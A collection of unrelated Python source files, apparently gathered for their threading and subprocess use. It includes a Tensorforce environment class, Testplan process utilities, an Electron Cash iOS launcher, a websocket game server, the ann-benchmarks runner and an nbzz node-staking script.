(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum state value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def actions(self):
"""
Returns the action space specification.
Returns:
specification: Arbitrarily nested dictionary of action descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – action data type
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) – action shape
(<span style="color:#00C000"><b>default</b></span>: scalar).</li>
<li><b>num_actions</b> (<i>int > 0</i>) – number of discrete action values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum action value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def max_episode_timesteps(self):
"""
Returns the maximum number of timesteps per episode.
Returns:
int: Maximum number of timesteps per episode.
"""
return None
def close(self):
"""
Closes the environment.
"""
if self.thread is not None:
self.thread.join()
self.observation = None
self.thread = None
def reset(self):
"""
Resets the environment to start a new episode.
Returns:
dict[state]: Dictionary containing initial state(s) and auxiliary information.
"""
raise NotImplementedError
# if self.observation is not None or self.thread is not None:
# raise TensorforceError(message="Invalid execute.")
# self.start_reset()
# self.thread.join()
# states, _, _ = self.observe()
# if self.observation is not None:
# raise TensorforceError(message="Invalid start_reset/observe implementation.")
# return states
def execute(self, actions):
"""
Executes the given action(s) and advances the environment by one step.
Args:
actions (dict[action]): Dictionary containing action(s) to be executed
(<span style="color:#C00000"><b>required</b></span>).
Returns:
((dict[state], bool | 0 | 1 | 2, float)): Dictionary containing next state(s), whether
a terminal state is reached or 2 if the episode was aborted, and observed reward.
"""
raise NotImplementedError
# if self.observation is not None or self.thread is not None:
# raise TensorforceError(message="Invalid execute.")
# self.start_execute(actions=actions)
# self.thread.join()
# observation = self.observe()
# if self.observation is not None:
# raise TensorforceError(message="Invalid start_execute/observe implementation.")
# return observation
def start_reset(self):
if self.thread is not None:
raise TensorforceError(message="Invalid start_reset.")
self.thread = Thread(target=self.finish_reset)
self.thread.start()
def finish_reset(self):
self.observation = (self.reset(), None, None)
self.thread = None
def start_execute(self, actions):
if self.observation is not None or self.thread is not None:
raise TensorforceError(message="Invalid start_execute.")
self.thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
self.thread.start()
def finish_execute(self, actions):
self.observation = self.execute(actions=actions)
self.thread = None
def retrieve_execute(self):
if self.thread is not None:
return None
else:
if self.observation is None:
raise TensorforceError(message="Invalid retrieve_execute.")
observation = self.observation
self.observation = None
return observation
|
process.py
|
"""System process utilities module."""
import time
import psutil
import warnings
import subprocess
import platform
import threading
import functools
from .timing import get_sleeper, exponential_interval
from testplan.common.utils.logger import TESTPLAN_LOGGER
def _log_proc(msg, warn=False, output=None):
if output is not None:
try:
output.write("{}{}".format(msg, "\n"))
except:
pass
if warn:
warnings.warn(msg)
def kill_process(proc, timeout=5, signal_=None, output=None):
"""
If alive, kills the process.
First call ``terminate()`` or pass ``signal_`` if specified
to terminate for up to time specified in timeout parameter.
If process hangs then call ``kill()``.
:param proc: process to kill
:type proc: ``subprocess.Popen``
:param timeout: timeout in seconds, defaults to 5 seconds
:type timeout: ``int``
:param output: Optional file like object for writing logs.
:type output: ``file``
:return: Exit code of process
:rtype: ``int`` or ``NoneType``
"""
_log = functools.partial(_log_proc, output=output)
retcode = proc.poll()
if retcode is not None:
return retcode
child_procs = psutil.Process(proc.pid).children(recursive=True)
if signal_ is not None:
proc.send_signal(signal_)
else:
proc.terminate()
sleeper = get_sleeper((0.05, 1), timeout=timeout)
while next(sleeper):
if retcode is None:
retcode = proc.poll()
else:
break
if retcode is None:
try:
_log(msg="Binary still alive, killing it")
proc.kill()
proc.wait()
except (RuntimeError, OSError) as error:
_log(msg="Could not kill process - {}".format(error), warn=True)
_, alive = psutil.wait_procs(child_procs, timeout=timeout)
for p in alive:
try:
p.kill()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(
msg="While terminating child process - {}".format(exc),
warn=True,
)
return proc.returncode
def kill_process_psutil(proc, timeout=5, signal_=None, output=None):
"""
If alive, kills the process (an instance of ``psutil.Process``).
Try killing the child process at first and then killing itself.
First call ``terminate()`` or pass ``signal_`` if specified
to terminate for up to time specified in timeout parameter.
If process hangs then call ``kill()``.
:param proc: process to kill
:type proc: ``psutil.Process``
:param timeout: timeout in seconds, defaults to 5 seconds
:type timeout: ``int``
:param output: Optional file like object for writing logs.
:type output: ``file``
:return: List of processes which are still alive
:rtype: ``list`` or ``psutil.Process``
"""
_log = functools.partial(_log_proc, output=output)
try:
all_procs = proc.children(recursive=True) + [proc]
except psutil.NoSuchProcess:
return []
try:
if signal_ is not None:
proc.send_signal(signal_)
else:
proc.terminate()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(msg="While terminating process - {}".format(exc), warn=True)
_, alive = psutil.wait_procs(all_procs, timeout=timeout)
if len(alive) > 0:
for p in alive:
try:
p.kill()
except psutil.NoSuchProcess:
pass # already dead
except Exception as exc:
_log(msg="Could not kill process - {}".format(exc), warn=True)
_, alive = psutil.wait_procs(alive, timeout=timeout)
return alive
DEFAULT_CLOSE_FDS = platform.system() != "Windows"
def subprocess_popen(
args,
bufsize=0, # unbuffered (`io.DEFAULT_BUFFER_SIZE` for Python 3 by default)
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=DEFAULT_CLOSE_FDS,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
"""
Wrapper for Subprocess.Popen, which defaults close_fds=True on Linux.
It's the behaviour we nearly always want,
and which has become default in 3.2+.
On Windows, closed_fds=False.
"""
if isinstance(args, list):
for idx, arg in enumerate(args):
args[idx] = str(arg)
try:
handle = subprocess.Popen(
args,
bufsize=bufsize,
executable=executable,
stdin=stdin,
stdout=stdout,
stderr=stderr,
preexec_fn=preexec_fn,
close_fds=close_fds,
shell=shell,
cwd=cwd,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
return handle
except:
print("subprocess.Popen failed, args: `{}`".format(args))
raise
def execute_cmd(
cmd,
label=None,
check=True,
stdout=None,
stderr=None,
logger=None,
env=None,
):
"""
Execute a subprocess command.
:param cmd: Command to execute - list of parameters.
:param label: Optional label for debugging
:param check: When True, check that the return code of the command is 0 to
ensure success - raises a RuntimeError otherwise. Defaults to
True - should be explicitly disabled for commands that may
legitimately return non-zero return codes.
:param stdout: Optional file-like object to redirect stdout to.
:param stderr: Optional file-like object to redirect stderr to.
:param logger: Optional logger object as logging destination.
:param env: Optional dict object as environment variables.
:return: Return code of the command.
"""
if not logger:
logger = TESTPLAN_LOGGER
if isinstance(cmd, list):
cmd = [str(a) for a in cmd]
cmd_string = " ".join(cmd) # for logging, easy to copy and execute
else:
cmd_string = cmd
if not label:
label = hash(cmd_string) % 1000
if stdout is None:
stdout = subprocess.PIPE
if stderr is None:
stderr = subprocess.PIPE
logger.debug("Executing command [%s]: '%s'", label, cmd_string)
start_time = time.time()
handler = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, env=env)
stdout, stderr = handler.communicate()
elapsed = time.time() - start_time
if handler.returncode != 0:
logger.debug(
"Failed executing command [%s] after %.2f sec.", label, elapsed
)
if stdout:
logger.debug("Stdout:\n%s", stdout)
if stderr:
logger.debug("Stderr:\n%s", stderr)
if check:
raise RuntimeError(
"Command '{}' returned with non-zero exit code {}".format(
cmd_string, handler.returncode
)
)
else:
logger.debug("Command [%s] finished in %.2f sec", label, elapsed)
return handler.returncode
def enforce_timeout(process, timeout=1, callback=None, output=None):
_log = functools.partial(_log_proc, output=output)
def _inner():
begin = time.time()
intervals = exponential_interval(maximum=10)
while True:
if process.returncode is not None:
_log(msg="Process returncode: {}".format(process.returncode))
break
elif time.time() - begin >= timeout:
_log(
msg="Killing binary after"
" reaching timeout value {}s".format(timeout)
)
try:
if callback:
callback()
finally:
kill_process(process, output=output)
break
else:
delay = next(intervals)
_log(msg="Sleeping for {}".format(delay))
time.sleep(delay)
_log("Exiting loop")
timeout_checker = threading.Thread(target=_inner)
timeout_checker.daemon = True
timeout_checker.start()
return timeout_checker
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
from electroncash.networks import set_mainnet, set_testnet
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
'testnet': 'EC_TESTNET' in os.environ, # You can set the env when testing using Xcode "Scheme" editor
}
if config_options.get('testnet'):
set_testnet()
else:
set_mainnet()
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version, ecc_fast, schnorr
NSLog("Electron Cash lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
NSLog("Fast ECC: %s Fast Schnorr: %s", str(ecc_fast.is_using_fast_ecc()), str(schnorr.has_fast_sign()))
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
websocket.py
|
from pdb import set_trace as T
import numpy as np
from signal import signal, SIGINT
import sys, os, json, pickle, time
import threading
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from twisted.python import log
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol
from autobahn.twisted.resource import WebSocketResource
class GodswordServerProtocol(WebSocketServerProtocol):
def __init__(self):
super().__init__()
print("Created a server")
self.frame = 0
#"connected" is already used by WSSP
self.sent_environment = False
self.isConnected = False
self.pos = [0, 0]
self.cmd = None
def onOpen(self):
print("Opened connection to server")
def onClose(self, wasClean, code=None, reason=None):
self.isConnected = False
print('Connection closed')
def connectionMade(self):
super().connectionMade()
self.factory.clientConnectionMade(self)
def connectionLost(self, reason):
super().connectionLost(reason)
self.factory.clientConnectionLost(self)
self.sent_environment = False
#Not used without player interaction
def onMessage(self, packet, isBinary):
print("Server packet", packet)
packet = packet.decode()
_, packet = packet.split(';') #Strip headeer
r, c, cmd = packet.split(' ') #Split camera coords
if len(cmd) == 0 or cmd == '\t':
cmd = None
self.pos = [int(r), int(c)]
self.cmd = cmd
self.isConnected = True
def onConnect(self, request):
print("WebSocket connection request: {}".format(request))
realm = self.factory.realm
self.realm = realm
self.frame += 1
def serverPacket(self):
data = self.realm.packet
return data
def sendUpdate(self, data):
packet = {}
packet['resource'] = data['resource']
packet['player'] = data['player']
packet['npc'] = data['npc']
packet['pos'] = data['pos']
packet['wilderness'] = data['wilderness']
print('Is Connected? : {}'.format(self.isConnected))
if not self.sent_environment:
packet['map'] = data['environment']
packet['border'] = data['border']
packet['size'] = data['size']
if 'overlay' in data:
packet['overlay'] = data['overlay']
print('SENDING OVERLAY: ', len(packet['overlay']))
packet = json.dumps(packet).encode('utf8')
self.sendMessage(packet, False)
class WSServerFactory(WebSocketServerFactory):
def __init__(self, ip, realm):
super().__init__(ip)
self.realm = realm
self.time = time.time()
self.clients = []
self.pos = [0, 0]
self.cmd = None
self.tickRate = 0.6
self.tick = 0
def update(self, packet):
self.tick += 1
uptime = np.round(self.tickRate*self.tick, 1)
delta = time.time() - self.time
print('Wall Clock: ', str(delta)[:5], 'Uptime: ', uptime, ', Tick: ', self.tick)
delta = self.tickRate - delta
if delta > 0:
time.sleep(delta)
self.time = time.time()
for client in self.clients:
client.sendUpdate(packet)
if client.pos is not None:
self.pos = client.pos
self.cmd = client.cmd
return self.pos, self.cmd
def clientConnectionMade(self, client):
self.clients.append(client)
def clientConnectionLost(self, client):
self.clients.remove(client)
class Application:
def __init__(self, realm):
signal(SIGINT, self.kill)
log.startLogging(sys.stdout)
port = 8080
self.factory = WSServerFactory(u'ws://localhost:{}'.format(port), realm)
self.factory.protocol = GodswordServerProtocol
resource = WebSocketResource(self.factory)
root = File(".")
root.putChild(b"ws", resource)
site = Site(root)
reactor.listenTCP(port, site)
def run():
reactor.run(installSignalHandlers=0)
threading.Thread(target=run).start()
def update(self, packet):
return self.factory.update(packet)
def kill(*args):
print("Killed by user")
reactor.stop()
os._exit(0)
|
runner.py
|
from __future__ import print_function
__true_print = print
import argparse
import datetime
import docker
import json
import multiprocessing.pool
import numpy
import os
import psutil
import requests
import sys
import threading
import time
def print(*args, **kwargs):
__true_print(*args, **kwargs)
sys.stdout.flush()
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import Definition, instantiate_algorithm
from ann_benchmarks.distance import metrics
from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count, use_batch_query):
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i+1, run_count))
n_items_processed = [0] # a bit dumb but can't be a scalar since of Python's scoping rules
def single_query(v):
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))
for idx in candidates]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' % (n_items_processed[0], X_test.shape[0]))
if len(candidates) > count:
print('warning: algorithm %s returned %d results, but count is only %d)' % (algo, len(candidates), count))
return (total, candidates)
def batch_query(X):
start = time.time()
result = algo.batch_query(X, count)
total = (time.time() - start)
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx])))
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
if use_batch_query:
results = batch_query(X_test)
else:
results = [single_query(x) for x in X_test]
total_time = sum(time for time, _ in results)
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": use_batch_query,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
return (attrs, results)
def run(definition, dataset, count, run_count=3, use_batch_query=False):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
try:
t0 = time.time()
index_size_before = algo.get_index_size("self")
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_index_size("self") - index_size_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(algo, X_train, X_test,
distance, count, run_count, use_batch_query)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = definition.algorithm
descriptor["dataset"] = dataset
store_results(dataset,
count, definition, query_arguments, descriptor, results)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs)
def run_docker(definition, dataset, count, runs, timeout=5*3600, mem_limit=None):
import colors # Think it doesn't work in Python 2
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
print('Running command', cmd)
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Memory limit:', mem_limit)
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'): {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'): {'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'): {'bind': '/home/app/results', 'mode': 'rw'},
},
mem_limit=mem_limit,
cpuset_cpus='0', # limit to the 1st CPU
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
if sys.version_info >= (3, 0):
t = threading.Thread(target=stream_logs, daemon=True)
else:
t = threading.Thread(target=stream_logs)
t.daemon = True
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Exit if exit code
if exit_code == 0:
return
elif exit_code is not None:
print(colors.color(container.logs().decode(), fg='red'))
raise Exception('Child process raised exception %d' % exit_code)
finally:
container.remove(force=True)
|
nbzz_run.py
|
import inspect
import yaml
from pathlib import Path
import threading
import os
try:
from tqdm import tqdm
except:
try:
os.system('pip3 install tqdm')
except:
print("tqdm install error ")
exit(1)
from tqdm import tqdm
# store builtin print
old_print = print
def new_print(*args, **kwargs):
# if tqdm.tqdm.write raises error, use builtin print
try:
tqdm.write(*args, **kwargs)
except:
old_print(*args, ** kwargs)
# globaly replace print with new_print
inspect.builtins.print = new_print
try:
from nbzz.cmds.pledge_funcs import add_pledge
from nbzz.cmds.start import start_cmd
from nbzz.util.config import load_config
import eth_keyfile
from web3 import Web3
from typing import Dict
from nbzz.util.default_root import DEFAULT_ROOT_PATH
from nbzz.rpc.xdai_rpc import connect_w3,get_model_contract,get_proxy_contract,get_glod_contract
from nbzz.cmds.start import statestore_dir
except:
print("nbzz未安装,此脚本需要安装nbzz 然后 . ./activate")
exit(1)
class nbzz_conract_check:
check_lock = threading.Lock()
def __init__(self, model_contract,glod_contract,proxy_contract, address):
self.model_contract = model_contract
self.glod_contract = glod_contract
self.proxy_contract = proxy_contract
self.address = address
def _contract_function(self, con_func, args, try_time=3, error_meesage="func error"):
for i in range(try_time):
try:
with nbzz_conract_check.check_lock:
return con_func(*args)
except:
pass
print(error_meesage)
def balanceOf(self):
return self._contract_function(lambda ad: self.proxy_contract.functions.balanceOf(ad).call()/1e18,
(self.address,),
error_meesage="获取nbzz余额失败")
def pledge_banlance(self):
return self._contract_function(lambda ad: self.glod_contract.functions.balancesPledge(ad).call()/1e18,
(self.address,),
error_meesage="获取质押状态失败")
def nbzz_status(self):
return self._contract_function(lambda ad: (self.model_contract.functions.nodeState(ad).call()),
(self.address,),
error_meesage="获取nbzz状态失败")
def i_thread_nbzz(ii_bee_path):
try:
swarm_key = ii_bee_path/"keys"/"swarm.key"
state_store= ii_bee_path/"statestore"
if not swarm_key.exists():
tqdm.write(f"{ii_bee_path} 目录下不存在keys文件,检查是否安装")
return
if not state_store.exists():
tqdm.write(f"{ii_bee_path} 目录下不存在statestore文件,检查是否安装")
return
with statestore_dir(state_store) as statestoredb:
overlay_address=statestoredb.get_overlay()
overlay_address=overlay_address
xdai_address = eth_keyfile.load_keyfile(str(swarm_key))["address"]
xdai_address = Web3.toChecksumAddress("0x"+xdai_address)
eth_stat = nbzz_conract_check(model_contract,glod_contract,proxy_contract, xdai_address)
nbzz_status=eth_stat.nbzz_status()
if nbzz_status[0] and (nbzz_status[3].hex()==overlay_address):
tqdm.write(f"{ii_bee_path} 已经启动")
return
with nbzz_conract_check.check_lock:
eth_balance = w3.eth.getBalance(xdai_address)/1e18
if eth_balance < 0.002:
tqdm.write(
f"{ii_bee_path} {xdai_address} xdai不足,目前余额: {eth_balance:.4f}")
return
pledge_num=eth_stat.pledge_banlance()
if pledge_num >= 15:
tqdm.write(f"{ii_bee_path} 已经完成质押 {pledge_num}")
else:
tqdm.write(f"{ii_bee_path} 已经质押 {pledge_num}")
tqdm.write(f"install bee in {ii_bee_path}")
nbzz_balance=eth_stat.balanceOf()
if nbzz_balance < 15-pledge_num:
tqdm.write(f"{ii_bee_path} 余额{nbzz_balance}小于{15-pledge_num} nbzz, 无法质押")
return
else:
tqdm.write("nbzz余额充足")
try:
with nbzz_conract_check.check_lock:
add_pledge(15-pledge_num, bee_passwd, str(swarm_key))
except Exception as ex:
tqdm.write(f"{ii_bee_path} 质押失败")
tqdm.write(str(ex))
return
try:
with nbzz_conract_check.check_lock:
os.system( f"nbzz start -p {bee_passwd} --bee-key-path {str(swarm_key)} --bee-statestore-path {str(state_store)}")
tqdm.write("")
# start_cmd(None,bee_passwd,str(swarm_key))
except:
tqdm.write(f"{ii_bee_path} 启动失败")
finally:
pbar.update(1)
# 初始化nbzz
os.system("nbzz init")
# 修改rpc
env = os.environ
if "NBZZ_RPC" in env:
os.system( f"sed -i \"/swap_endpoint: /c\\swap_endpoint: {env['NBZZ_RPC']} \" /root/.nbzz/mainnet1/config/config.yaml")
print(f"rpc 替换为{ env['NBZZ_RPC'] }")
# 读取createbee配置
bee_con_path = Path("config.yaml")
if not bee_con_path.exists():
print("路径错误,请移动到bee批量安装脚本的启动目录.")
exit(1)
with bee_con_path.open("r",) as fid:
bee_con = yaml.safe_load(fid)
bee_install_path = Path(bee_con["bee"]["base_path"])
bee_passwd = bee_con["bee"]["password"]
if not bee_install_path.exists():
print("bee未安装或者未成功启动")
exit(1)
# 读取合约
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
w3=connect_w3(config["swap_endpoint"])
model_contract = get_model_contract(w3)
proxy_contract=get_proxy_contract(w3)
glod_contract=get_glod_contract(w3)
# 开始部署
all_bee_path = [i for i in bee_install_path.glob(".bee*")]
all_bee_path.sort()
all_thread = []
pbar=tqdm(total=len(all_bee_path))
for i_bee_path in all_bee_path:
ithread = threading.Thread(target=i_thread_nbzz, args=(i_bee_path,))
all_thread.append(ithread)
ithread.setDaemon(True)
ithread.start()
for ithread in all_thread:
ithread.join()
|
backend.py
|
import atexit
import time
import sys
from threading import Thread
from abc import abstractmethod
from collections import deque
from typing import Union
from tmtccmd.config.definitions import CoreServiceList, CoreModeList
from tmtccmd.tm.definitions import TmTypes
from tmtccmd.tm.handler import TmHandler
from tmtccmd.utility.logger import get_console_logger
from tmtccmd.sendreceive.sequential_sender_receiver import (
SequentialCommandSenderReceiver,
)
from tmtccmd.sendreceive.tm_listener import TmListener
from tmtccmd.ccsds.handler import CcsdsTmHandler
from tmtccmd.com_if.com_interface_base import CommunicationInterface
from tmtccmd.utility.tmtc_printer import TmTcPrinter
from tmtccmd.tc.packer import ServiceQueuePacker
LOGGER = get_console_logger()
class BackendBase:
@abstractmethod
def initialize(self):
"""Initialize the backend. Raise RuntimeError or ValueError on failure"""
@abstractmethod
def start_listener(self):
"""Start the backend. Raise RuntimeError on failure"""
@abstractmethod
def set_mode(self, mode: int):
"""Set backend mode
:param mode:
:return:
"""
class TmTcHandler(BackendBase):
"""This is the primary class which handles TMTC reception. This can be seen as the backend
in case a GUI or front-end is implemented.
"""
def __init__(
self,
com_if: CommunicationInterface,
tmtc_printer: TmTcPrinter,
tm_listener: TmListener,
tm_handler: TmHandler,
init_mode: int,
init_service: Union[str, int] = CoreServiceList.SERVICE_17.value,
init_opcode: str = "0",
):
self.mode = init_mode
self.com_if_key = com_if.get_id()
self.__com_if_active = False
self.__service = init_service
self.__op_code = init_opcode
self.__apid = 0
# This flag could be used later to command the TMTC Client with a front-end
self.one_shot_operation = True
self.__com_if = com_if
self.__tmtc_printer = tmtc_printer
self.__tm_listener = tm_listener
if tm_handler.get_type() == TmTypes.CCSDS_SPACE_PACKETS:
self.__tm_handler: CcsdsTmHandler = tm_handler
for apid_queue_len_tuple in self.__tm_handler.get_apid_queue_len_list():
self.__tm_listener.subscribe_ccsds_tm_handler(
apid_queue_len_tuple[0], apid_queue_len_tuple[1]
)
self.exit_on_com_if_init_failure = True
self.single_command_package = bytearray(), None
def get_com_if_id(self):
return self.com_if_key
def get_com_if(self) -> CommunicationInterface:
return self.__com_if
def get_printer(self) -> TmTcPrinter:
return self.__tmtc_printer
def get_listener(self):
return self.__tm_listener
def set_com_if(self, com_if: CommunicationInterface):
if not self.is_com_if_active():
self.__com_if = com_if
self.__tm_listener.set_com_if(self.__com_if)
else:
LOGGER.warning(
"Communication Interface is active and must be closed first before"
"reassigning a new one"
)
def is_com_if_active(self):
return self.__com_if_active
def set_one_shot_or_loop_handling(self, enable: bool):
"""
Specify whether the perform_operation() call will only handle one action depending
on the mode or keep listening for replies after handling an operation.
"""
self.one_shot_operation = enable
def set_mode(self, mode: int):
"""
Set the mode which will determine what perform_operation does.
"""
self.mode = mode
def get_mode(self) -> int:
return self.mode
def set_service(self, service: Union[str, int]):
self.__service = service
def set_opcode(self, op_code: str):
self.__op_code = op_code
def get_service(self) -> Union[str, int]:
return self.__service
def get_opcode(self) -> str:
return self.__op_code
def get_current_apid(self) -> int:
return self.__apid
def set_current_apid(self, apid: int):
self.__apid = apid
@staticmethod
def prepare_tmtc_handler_start(
com_if: CommunicationInterface,
tmtc_printer: TmTcPrinter,
tm_listener: TmListener,
init_mode: int,
init_service: Union[str, int] = CoreServiceList.SERVICE_17.value,
init_opcode: str = "0",
):
from multiprocessing import Process
tmtc_handler = TmTcHandler(
com_if=com_if,
tmtc_printer=tmtc_printer,
tm_listener=tm_listener,
init_mode=init_mode,
init_service=init_service,
init_opcode=init_opcode,
)
tmtc_task = Process(target=TmTcHandler.start_handler, args=(tmtc_handler,))
return tmtc_task
@staticmethod
def start_handler(executed_handler):
if not isinstance(executed_handler, TmTcHandler):
LOGGER.error("Unexpected argument, should be TmTcHandler!")
sys.exit(1)
executed_handler.initialize()
executed_handler.start_listener()
def initialize(self):
from tmtccmd.utility.exit_handler import keyboard_interrupt_handler
"""
Perform initialization steps which might be necessary after class construction.
This has to be called at some point before using the class!
"""
if self.mode == CoreModeList.LISTENER_MODE:
LOGGER.info("Running in listener mode..")
atexit.register(
keyboard_interrupt_handler, tmtc_backend=self, com_interface=self.__com_if
)
def start_listener(self, perform_op_immediately: bool = True):
try:
self.__com_if.open()
self.__tm_listener.start()
self.__com_if_active = True
except IOError:
LOGGER.error("Communication Interface could not be opened!")
LOGGER.info("TM listener will not be started")
if self.exit_on_com_if_init_failure:
LOGGER.error("Closing TMTC commander..")
self.__com_if.close()
sys.exit(1)
if perform_op_immediately:
self.perform_operation()
def close_listener(self, join: bool = False, join_timeout_seconds: float = 1.0):
"""Closes the TM listener and the communication interface. This is started in a separarate
thread because the communication interface might still be busy. The completion can be
checked with :meth:`tmtccmd.core.backend.is_com_if_active`. Alternatively, waiting on
completion is possible by specifying the join argument and a timeout in
floating point second.
:param join:
:param join_timeout_seconds:
:return:
"""
if self.__com_if_active:
close_thread = Thread(target=self.__com_if_closing)
close_thread.start()
if join:
close_thread.join(timeout=join_timeout_seconds)
def perform_operation(self):
"""Periodic operation"""
try:
self.__core_operation(self.one_shot_operation)
except KeyboardInterrupt:
LOGGER.info("Keyboard Interrupt.")
sys.exit()
except IOError:
LOGGER.exception("IO Error occured")
sys.exit()
def __com_if_closing(self):
self.__tm_listener.stop()
while True:
if not self.__tm_listener.is_listener_active():
self.__com_if.close()
self.__com_if_active = False
break
else:
time.sleep(0.2)
def __handle_action(self):
"""Command handling."""
if self.mode == CoreModeList.LISTENER_MODE:
if self.__tm_listener.reply_event():
LOGGER.info("TmTcHandler: Packets received.")
packet_queues = self.__tm_listener.retrieve_tm_packet_queues(clear=True)
if len(packet_queues) > 0:
self.__tm_handler.handle_packet_queues(
packet_queue_list=packet_queues
)
self.__tm_listener.clear_reply_event()
